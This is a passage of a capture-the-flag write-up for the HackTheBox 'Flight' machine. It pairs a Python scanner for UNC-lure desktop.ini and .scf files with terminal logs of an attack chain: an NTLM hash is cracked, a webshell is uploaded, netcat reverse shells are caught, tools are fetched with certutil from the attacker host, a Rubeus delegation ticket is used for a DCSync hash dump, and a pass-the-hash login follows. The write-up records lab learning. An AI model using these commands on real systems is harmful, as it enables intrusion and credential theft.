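URL_RE = re.compile(r"(?:file|smb)://([^/\s,]+)", re.I)  # file://host/...


def referenced_hosts(line: str) -> Set[str]:
    """Hosts named by UNC or file://-style references on one line."""
    hosts = set(UNC_RE.findall(line))
    hosts.update(URL_RE.findall(line))
    return {h.lower() for h in hosts}


def scan_file(path: str, trusted: Set[str]) -> Optional[dict]:
    """Return a finding for an auto-fetch file referencing an untrusted host."""
    name = os.path.basename(path).lower()
    if name not in AUTO_FETCH_NAMES and os.path.splitext(name)[1] not in AUTO_FETCH_EXTS:
        return None
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            lines = fh.read().splitlines()
    except OSError:
        return None
    for line in lines:
        key, sep, value = line.partition("=")
        if not sep or key.strip().lower() not in AUTO_FETCH_KEYS:
            continue
        bad = {h for h in referenced_hosts(value) if h not in trusted}
        if bad:
            return {"file": name, "key": key.strip(), "hosts": sorted(bad)}
    return None


def scan_share(root: str, trusted: Set[str]) -> List[dict]:
    """Walk a directory tree and collect findings, sorted by file name."""
    trusted = {t.lower() for t in trusted}
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            hit = scan_file(os.path.join(dirpath, fname), trusted)
            if hit:
                findings.append(hit)
    return sorted(findings, key=lambda h: (h["file"], h["key"]))


def build_sample_share() -> str:
    """Write a constructed share: one lure desktop.ini, one benign one, one .scf."""
    root = tempfile.mkdtemp(prefix="shared_")
    samples = {
        # Shape of the ntlm_theft desktop.ini lure (constructed here).
        "desktop.ini": "[.ShellClassInfo]\r\nIconResource=\\\\10.10.14.31\\aa\r\n",
        # Legitimate customised folder icon served from an internal host.
        "Icons/desktop.ini": "[.ShellClassInfo]\r\nIconResource=\\\\dc01\\netlogon\\logo.ico,0\r\n",
        # .scf files fetch IconFile as soon as the folder is displayed.
        "report.scf": "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.10.14.31\\share\\x.ico\r\n"
                      "[Taskbar]\r\nCommand=ToggleDesktop\r\n",
        # A UNC path in a plain text file is not auto-fetched, so it is ignored.
        "readme.txt": "see \\\\10.10.14.31\\docs\r\n",
    }
    for rel, content in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", newline="") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    share = build_sample_share()
    for hit in scan_share(share, trusted={"dc01", "g0", "flight.htb"}):
        print(f"{hit['file']}: {hit['key']} -> {', '.join(hit['hosts'])}")
```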

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# echo "" > hash.txt

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# vim hash.txt

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john hash.txt --wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Tikkycoll_431012284 (c.bum)
1g 0:00:00:22 DONE (2026-06-18 08:12) 0.04363g/s 459727p/s 459727c/s 459727C/s TinyMutt69..Tiffani29
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

Check this user's permissions

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.228.120 -u 'c.bum' -p 'Tikkycoll_431012284' --shares
SMB 10.129.228.120 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.228.120 445 G0 [+] flight.htb\c.bum:Tikkycoll_431012284
SMB 10.129.228.120 445 G0 [*] Enumerated shares
SMB 10.129.228.120 445 G0 Share Permissions Remark
SMB 10.129.228.120 445 G0 ----- ----------- ------
SMB 10.129.228.120 445 G0 ADMIN$ Remote Admin
SMB 10.129.228.120 445 G0 C$ Default share
SMB 10.129.228.120 445 G0 IPC$ READ Remote IPC
SMB 10.129.228.120 445 G0 NETLOGON READ Logon server share
SMB 10.129.228.120 445 G0 Shared READ,WRITE
SMB 10.129.228.120 445 G0 SYSVOL READ Logon server share
SMB 10.129.228.120 445 G0 Users READ
SMB 10.129.228.120 445 G0 Web READ,WRITE

This user can write to a share named Web

┌──(root㉿kaada)-[/opt/ntlm_theft/exploit]
└─# smbclient //flight.htb/Web -U c.bum 'Tikkycoll_431012284'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jun 18 15:13:15 2026
.. D 0 Thu Jun 18 15:13:15 2026
flight.htb D 0 Thu Jun 18 15:12:01 2026
school.flight.htb D 0 Thu Jun 18 15:12:01 2026

5056511 blocks of size 4096. 1253970 blocks available
smb: \>

┌──(root㉿kaada)-[/opt/ntlm_theft/exploit]
└─# smbclient //flight.htb/Web -U c.bum 'Tikkycoll_431012284'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jun 18 15:13:15 2026
.. D 0 Thu Jun 18 15:13:15 2026
flight.htb D 0 Thu Jun 18 15:12:01 2026
school.flight.htb D 0 Thu Jun 18 15:12:01 2026

5056511 blocks of size 4096. 1253970 blocks available
smb: \> cd flight.htb\
smb: \flight.htb\> dir
. D 0 Thu Jun 18 15:12:01 2026
.. D 0 Thu Jun 18 15:12:01 2026
css D 0 Thu Jun 18 15:12:01 2026
images D 0 Thu Jun 18 15:12:01 2026
index.html A 7069 Thu Feb 24 05:58:10 2022
js D 0 Thu Jun 18 15:12:01 2026

5056511 blocks of size 4096. 1253714 blocks available
smb: \flight.htb\>

This is the website root directory; upload an aspx webshell.

(Ugh... forgot this box runs on Apache, a PHP webshell is what's needed)

┌──(root㉿kaada)-[/opt/ntlm_theft/exploit]
└─# cp /home/kali/Downloads/webshell.php .

┌──(root㉿kaada)-[/opt/ntlm_theft/exploit]
└─# smbclient //flight.htb/Web -U c.bum 'Tikkycoll_431012284'
Try "help" to get a list of possible commands.
smb: \> cd flight.htb\
smb: \flight.htb\> put webshell.php
putting file webshell.php as \flight.htb\webshell.php (9.3 kB/s) (average 9.3 kB/s)
smb: \flight.htb\>

Upload nc and other tools, and get a reverse shell

┌──(root㉿kaada)-[/opt/ntlm_theft/exploit]
└─# smbclient //flight.htb/Web -U c.bum 'Tikkycoll_431012284'
Try "help" to get a list of possible commands.
smb: \> cd flight.htb\
smb: \flight.htb\> dir
. D 0 Thu Jun 18 15:27:01 2026
.. D 0 Thu Jun 18 15:27:01 2026
css D 0 Thu Jun 18 15:27:01 2026
images D 0 Thu Jun 18 15:27:01 2026
index.html A 7069 Thu Feb 24 05:58:10 2022
js D 0 Thu Jun 18 15:27:01 2026

5056511 blocks of size 4096. 1253426 blocks available
smb: \flight.htb\> upload webshell.php
upload: command not found
smb: \flight.htb\> put webshell.php
putting file webshell.php as \flight.htb\webshell.php (19.7 kB/s) (average 19.7 kB/s)
smb: \flight.htb\>

Damn, this box even has a self-cleaning feature and periodically wipes the web directory.

So just upload a reverse-shell payload directly instead

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 -> 127.0.0.1192.168.21.128192.168.56.104192.168.10.150172.17.0.1172.18.0.1198.18.0.110.10.14.31
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] [New Reverse Shell] => flight.htb 10.129.228.120 WINDOWS 👤 😍️ Session ID <1>
[+] Added readline support...
[+] Interacting with session [1] • Readline • Menu key Ctrl-D ⇐
[+] Session log: /home/kali/.penelope/sessions/flight.htb~10.129.228.120-WINDOWS/2026_06_18-08_34_16-576.log
────────────────────────────────────────────────────────────────────────────────────────────────────────────────
C:\xampp\htdocs\flight.htb>

Damn, Penelope is completely unreliable; doing it manually works better

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nc -lvvp 4444
listening on [any] 4444 ...
connect to [10.10.14.31] from flight.htb [10.129.228.120] 49260
SOCKET: Shell has connected! PID: 2772
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\flight.htb>whoami
flight\svc_apache

C:\xampp\htdocs\flight.htb>

Upload some necessary tools

c:\Users\Public>certutil -urlcache -split -f "http://10.10.14.31/nc64.exe" nc64.exe
**** Online ****
0000 ...
b0d8
CertUtil: -URLCache command completed successfully.

c:\Users\Public>certutil -urlcache -split -f "http://10.10.14.31/RunasCs.exe" RunasCs.exe
**** Online ****
0000 ...
ca00
CertUtil: -URLCache command completed successfully.

c:\Users\Public> certutil -urlcache -split -f "http://10.10.14.31/winPEASany.exe" winPEASany.exe

*** Online ****
000000 ...
a9de00
CertUtil: -URLCache command completed successfully.

c:\Users\Public>

Switch to the other user (c.bum, whose password was recovered earlier).

c:\Users\Public>.\RunasCs.exe c.bum Tikkycoll_431012284 cmd.exe -r 10.10.14.31:5555  
[*] Warning: The logon for user 'c.bum' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-74417$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 8 created in background.

c:\Users\Public>

c:\Users\C.Bum>type desktop\user.txt
type desktop\user.txt
e8337e2e095c01a3abd0db3fcc313dff


Check the listening ports.

╔══════════╣ Current TCP Listening Ports (T1049)
╚ Check for services restricted from the outside
Enumerating IPv4 connections

Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name

TCP 0.0.0.0 80 0.0.0.0 0 Listening 5244 httpd
TCP 0.0.0.0 88 0.0.0.0 0 Listening 656 lsass
TCP 0.0.0.0 135 0.0.0.0 0 Listening 916 svchost
TCP 0.0.0.0 389 0.0.0.0 0 Listening 656 lsass
TCP 0.0.0.0 443 0.0.0.0 0 Listening 5244 httpd
TCP 0.0.0.0 445 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 464 0.0.0.0 0 Listening 656 lsass
TCP 0.0.0.0 593 0.0.0.0 0 Listening 916 svchost
TCP 0.0.0.0 636 0.0.0.0 0 Listening 656 lsass
TCP 0.0.0.0 3268 0.0.0.0 0 Listening 656 lsass
TCP 0.0.0.0 3269 0.0.0.0 0 Listening 656 lsass
TCP 0.0.0.0 5985 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 8000 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 9389 0.0.0.0 0 Listening 2636 Microsoft.ActiveDirectory.WebServices
TCP 0.0.0.0 47001 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 49664 0.0.0.0 0 Listening 500 wininit
TCP 0.0.0.0 49665 0.0.0.0 0 Listening 1172 svchost
TCP 0.0.0.0 49666 0.0.0.0 0 Listening 1604 svchost
TCP 0.0.0.0 49667 0.0.0.0 0 Listening 656 lsass
TCP 0.0.0.0 49673 0.0.0.0 0 Listening 656 lsass
TCP 0.0.0.0 49674 0.0.0.0 0 Listening 656 lsass
TCP 0.0.0.0 49684 0.0.0.0 0 Listening 636 services
TCP 0.0.0.0 49695 0.0.0.0 0 Listening 2800 dns
TCP 0.0.0.0 49723 0.0.0.0 0 Listening 2760 dfsrs
TCP 10.129.228.120 53 0.0.0.0 0 Listening 2800 dns
TCP 10.129.228.120 80 10.10.14.31 36472 Established 5244 httpd
TCP 10.129.228.120 80 10.10.14.31 38352 Close Wait 5244 httpd
TCP 10.129.228.120 139 0.0.0.0 0 Listening 4 System
TCP 10.129.228.120 49260 10.10.14.31 4444 Established 5284 httpd
TCP 10.129.228.120 58613 10.10.14.31 5555 Established 4756
TCP 127.0.0.1 53 0.0.0.0 0 Listening 2800 dns

Compared with the external scan, there is an extra port 8000 listening locally that was not reachable from outside; forward it out.

I'll stick with the traditional chisel reverse port forward here.
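As an added example (not part of the original writeup), the Python helper below parses rows in the layout of the listing above and reports ports that are listening on the host but were not open in the external rustscan at the top of the post; the sample rows and the external port set are constructed from this page's own output.

```python
import re

# Constructed sample in the same column layout as the winPEAS listing above
# (only a handful of rows, including a two-word "Close Wait" state).
LISTENING_SAMPLE = """\
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 0.0.0.0 80 0.0.0.0 0 Listening 5244 httpd
TCP 0.0.0.0 445 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 5985 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 8000 0.0.0.0 0 Listening 4 System
TCP 10.129.228.120 53 0.0.0.0 0 Listening 2800 dns
TCP 10.129.228.120 80 10.10.14.31 38352 Close Wait 5244 httpd
TCP 10.129.228.120 49260 10.10.14.31 4444 Established 5284 httpd
TCP 127.0.0.1 53 0.0.0.0 0 Listening 2800 dns
"""

# Ports the external rustscan (start of the writeup) reported as open.
EXTERNAL_OPEN = {53, 80, 445, 464, 389, 593, 636, 3268, 3269, 9389,
                 49667, 49673, 49674, 49695, 49723}

# The State column may contain a space ("Close Wait"), so it is matched
# lazily and the numeric PID column acts as the delimiter after it.
ROW = re.compile(
    r"^(?P<proto>TCP|UDP)\s+(?P<laddr>\S+)\s+(?P<lport>\d+)\s+"
    r"(?P<raddr>\S+)\s+(?P<rport>\d+)\s+(?P<state>[A-Za-z ]+?)\s+"
    r"(?P<pid>\d+)\s*(?P<proc>.*)$"
)


def parse_listeners(text):
    """Return {(local_addr, port): process_name} for rows in Listening state."""
    listeners = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m or m.group("state") != "Listening":
            continue
        listeners[(m.group("laddr"), int(m.group("lport")))] = m.group("proc") or "?"
    return listeners


def internal_only_ports(text, external_open):
    """Listening ports not seen open from outside, split by bind address.

    "loopback" ports are bound to 127.x only; "filtered" ports are bound to
    all interfaces or the host IP, so only a host firewall hides them.
    """
    hidden = {"loopback": set(), "filtered": set()}
    for (addr, port), _proc in parse_listeners(text).items():
        if port in external_open:
            continue
        bucket = "loopback" if addr.startswith("127.") else "filtered"
        hidden[bucket].add(port)
    return hidden
```

On the sample, 8000 and 5985 come back as firewall-filtered services worth a closer look, while the established reverse-shell connections are ignored.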

c:\Users\C.Bum>certutil -urlcache -split -f "http://10.10.14.31/chisel.exe" chisel.exe
certutil -urlcache -split -f "http://10.10.14.31/chisel.exe" chisel.exe
**** Online ****
000000 ...
a1ee00
CertUtil: -URLCache command completed successfully.

c:\Users\C.Bum>
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.228.120 - - [18/Jun/2026 09:05:57] "GET /chisel.exe HTTP/1.1" 200 -
10.129.228.120 - - [18/Jun/2026 09:06:14] "GET /chisel.exe HTTP/1.1" 200 -

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./chisel server -p 12345 --reverse
2026/06/18 09:06:52 server: Reverse tunnelling enabled
2026/06/18 09:06:52 server: Fingerprint BHsiOpG9P8Oci6aJjeDqdBcJqkGDp8Szrpqa+xIKdWE=
2026/06/18 09:06:52 server: Listening on http://0.0.0.0:12345

c:\Users\C.Bum>chisel.exe client 10.10.14.31:12345 R:8000:127.0.0.1:8000
chisel.exe client 10.10.14.31:12345 R:8000:127.0.0.1:8000
2026/06/18 09:08:22 client: Connecting to ws://10.10.14.31:12345
2026/06/18 09:08:24 client: Connected (Latency 195.6609ms)
2026/06/18 09:08:23 server: session#1: Client version (1.11.3) differs from server version (1.10.1)
2026/06/18 09:08:23 server: session#1: tun: proxy#R:8000=>8000: Listening

The site on port 8000 is an ASP (IIS) application.

Its source lives here:

c:\inetpub\development>dir
dir
Volume in drive C has no label.
Volume Serial Number is 1DF4-493D

Directory of c:\inetpub\development

06/18/2026 09:17 AM <DIR> .
06/18/2026 09:17 AM <DIR> ..
04/16/2018 02:23 PM 9,371 contact.html
06/18/2026 09:17 AM <DIR> css
06/18/2026 09:17 AM <DIR> fonts
06/18/2026 09:17 AM <DIR> img
04/16/2018 02:23 PM 45,949 index.html
06/18/2026 09:17 AM <DIR> js
2 File(s) 55,320 bytes
6 Dir(s) 5,060,624,384 bytes free

c:\inetpub\development>

Upload an ASPX reverse-shell webshell into that directory and catch the callback.

┌──(root㉿kaada)-[/home/kali]
└─# nc -lvvp 6666
listening on [any] 6666 ...
connect to [10.10.14.31] from flight.htb [10.129.228.120] 65227
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>whoami /all
whoami /all

USER INFORMATION
----------------

User Name SID
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

c:\windows\system32\inetsrv>

SeImpersonatePrivilege Impersonate a client after authentication Enabled

GodPotato, I still remember you.

That said, the intended solution is to use this privilege to request a delegation ticket and then DCSync.

c:\Users\Public>certutil -urlcache -split -f "http://10.10.14.31/Rubeus.exe" Rubeus.exe
certutil -urlcache -split -f "http://10.10.14.31/Rubeus.exe" Rubeus.exe
**** Online ****
000000 ...
06d200
CertUtil: -URLCache command completed successfully.

c:\Users\Public>

c:\Users\Public>Rubeus.exe tgtdeleg /nowrap
Rubeus.exe tgtdeleg /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.0


[*] Action: Request Fake Delegation TGT (current user)

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/g0.flight.htb'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: rLe+6vNJB5BEMrJ9j2BfnHH4pEahLXaJbnfL4yBuyAc=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):


Use minikerberos-kirbi2ccache to convert the ticket to ccache format.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# minikerberos-kirbi2ccache ticket.kirbi ticket.ccache
INFO:root:Parsing kirbi file /home/kali/Desktop/ticket.kirbi
INFO:root:Done!

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# export KRB5CCNAME=ticket.ccache

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# sudo ntpdate 10.129.228.120
2026-06-18 16:44:35.018250 (+0000) +25201.127685 +/- 0.045837 10.129.228.120 s1 no-leap
CLOCK: time stepped by 25201.127685

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-secretsdump -k -no-pass g0.flight.htb -just-dc-user administrator
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:08c3eb806e4a83cdc660a54970bf3f3043256638aea2b62c317feffb75d89322
Administrator:aes128-cts-hmac-sha1-96:735ebdcaa24aad6bf0dc154fcdcb9465
Administrator:des-cbc-md5:c7754cb5498c2a2f
[*] Cleaning up...

With the Administrator hash, just log in directly.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-psexec Administrator@flight.htb -hashes aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on flight.htb.....
[*] Found writable share ADMIN$
[*] Uploading file YupGHLaF.exe
[*] Opening SVCManager on flight.htb.....
[*] Creating service IUcq on flight.htb.....
[*] Starting service IUcq.....
[!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami nt authority\system

C:\Windows\system32>

Not sure why psexec drops characters in its output here, so let's use smbexec instead.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-smbexec Administrator@10.129.228.120 -hashes aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32> type c:\users\administrator\desktop\root.txt
9131885ea46313a5ee0f36d645727a69

C:\Windows\system32>


http://example.com/2026/06/18/HackThebox-Flight/
Author: Skyarrow
Posted on: June 18, 2026